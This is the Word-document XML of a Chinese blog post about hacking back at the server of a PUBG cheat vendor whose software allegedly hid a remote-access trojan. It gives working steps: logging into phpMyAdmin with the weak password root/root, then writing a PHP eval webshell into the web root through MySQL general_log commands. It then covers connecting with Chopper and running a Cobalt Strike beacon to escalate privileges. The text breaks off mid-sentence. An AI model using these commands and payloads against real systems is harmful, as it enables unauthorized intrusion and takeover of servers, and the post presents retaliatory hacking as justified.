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记一次对PUBG外挂病毒的反制过程</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者：夜无名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>事件前言：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  这事还要从一只蝙蝠开始说起~...........疫情的原因在家闲的翻箱倒柜，翻出了这么个玩意，没错这就是“压枪神器”想当初我把把落地成盒又在某宝铺天盖地的推送下，忍痛割爱花了百来块钱买了这神器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4398645" cy="2944495"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:docPr id="1" name="图片 1" descr="微信图片_2020032610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326102309"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:srcRect b="49847"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4398645" cy="2944495"/>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 xml:space="preserve">  买回来后开始后悔了，经过简单的观察分析此USB的行为，并非啥智能压枪芯片，实际上就是一个软件加密狗的USB加密了商家给发的无后坐软件，通过对某宝搜索加密狗USB看看这价格，属实暴利。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2197735" cy="3481705"/>
            <wp:effectExtent l="0" t="0" r="12065" b="4445"/>
            <wp:docPr id="2" name="图片 2" descr="加密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加密狗"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2197735" cy="3481705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>故事开始：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  因翻出了此USB加密狗，心血来潮想开把游戏试试还有没有效果，进入商家之前提供的下载地址下载软件，这次幸运的忘了关杀毒软件，哦豁？？这是嘛呀，这图标咋这么熟悉呢，这不是赤裸裸的远控吗，难怪商家之前一直强调要先关了杀毒软件在打开，原来藏着这么大的猫腻。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3782695" cy="3545840"/>
            <wp:effectExtent l="0" t="0" r="8255" b="16510"/>
            <wp:docPr id="3" name="图片 3" descr="360拦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拦截"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3782695" cy="3545840"/>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 xml:space="preserve">  之前也一直傻愣愣的把杀毒软件都关了才开始玩的，USB是从去年四月份购入的，合着当了差不多一年的肉鸡了，坑我钱封我号就算了还拿我当肉鸡使，这谁受得了必须得搞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息探测：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  二话不说直接丢到微步沙箱分析一波看看能不能挖出什么重要的信息，软件的持久化跟读取系统信息这类的高危操作行为，确定远控无疑了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3872865" cy="3021965"/>
            <wp:effectExtent l="0" t="0" r="13335" b="6985"/>
            <wp:docPr id="4" name="图片 4" descr="高危行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高危行为"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3872865" cy="3021965"/>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3547745" cy="2433955"/>
            <wp:effectExtent l="0" t="0" r="14605" b="4445"/>
            <wp:docPr id="5" name="图片 5" descr="执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执行流程"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3547745" cy="2433955"/>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 xml:space="preserve">  再翻翻有没有跟软件交互的ip或者URL做为入手点，果不其然在大量的URL链接中发现了一条开着http协议的ip地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4103370" cy="2761615"/>
            <wp:effectExtent l="0" t="0" r="11430" b="635"/>
            <wp:docPr id="6" name="图片 6" descr="ip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p文本"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4103370" cy="2761615"/>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 xml:space="preserve">  访问之~其http://10x.xx.xx.xx/1/1.txt内容就是软件上的公告，确定了这台ip是软件的服务器没跑了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4598670" cy="2908300"/>
            <wp:effectExtent l="0" t="0" r="11430" b="6350"/>
            <wp:docPr id="7" name="图片 7" descr="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txt"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4598670" cy="2908300"/>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 xml:space="preserve"> 既然开了web的服务，直接上dirmap强大的目录探测工具看看能不能跑出啥重要信息，速度很快不一会探测出了PHPmyadmin等信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4719955" cy="2935605"/>
            <wp:effectExtent l="0" t="0" r="4445" b="17145"/>
            <wp:docPr id="8" name="图片 8" descr="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yadmin"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4719955" cy="2935605"/>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 xml:space="preserve">  直接复制路径访问，习惯性的一波弱口令root/root给进去了.......像这类的软件作者安全意识很低几乎没有，因为没有人去抓包去分析流量很难发现背后所交互的ip，果然又是一套phpStudy搭建起来的web服务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5323840" cy="4471035"/>
            <wp:effectExtent l="0" t="0" r="10160" b="5715"/>
            <wp:docPr id="9" name="图片 9" descr="PHP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HP2014"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5323840" cy="4471035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>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Getshell:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因为已经拿到了phpmyadmin的数据库且还是root权限的，可利用数据库的日志导出功能导出一句话php。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>先手动开启日志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set global  general_log='on'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="宋体" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="宋体" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="宋体" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3315335" cy="1927860"/>
            <wp:effectExtent l="0" t="0" r="18415" b="15240"/>
            <wp:docPr id="10" name="图片 1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o"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3315335" cy="1927860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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检查是否开启成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>show variables like "general_log%"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="宋体" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="宋体" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3353435" cy="2618105"/>
            <wp:effectExtent l="0" t="0" r="18415" b="10795"/>
            <wp:docPr id="11" name="图片 11" descr="日志开启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日志开启成功"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3353435" cy="2618105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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设置日志文件输出的路径，结合PHPinfo文件得到网站的绝对路径，直接输出到web路径下。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>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t>set global  general_log_file ="C:\phpStudy\PHPTutorial\WWW\info.php"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>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3597275" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="13" name="图片 1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nfo"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3597275" cy="1981200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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写入一句话，输出到日志文件中。select '&lt;?php eval($_POST['tools']);?&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>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菜刀连接上刚刚导出的一句话。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>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4196080" cy="2279650"/>
            <wp:effectExtent l="0" t="0" r="13970" b="6350"/>
            <wp:docPr id="14" name="图片 14" desc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hell"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4196080" cy="2279650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">权限提升:   </w:t>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到这里就已经拿到了webshell，但shell 的权限还太过于小我们的目标是拿下对方的系统权限，这里我用cs上线方便后续的操作，cs生成上线程序“splww64.exe”，利用菜刀的虚拟终端管理运行我们的程序。</w:t>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3343275" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="15" name="图片 15" descr="微信截图_2020032622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00326221151"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3343275" cy="1181100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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olor w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过了几秒C</w:t>
      </w:r>
      <w:r>
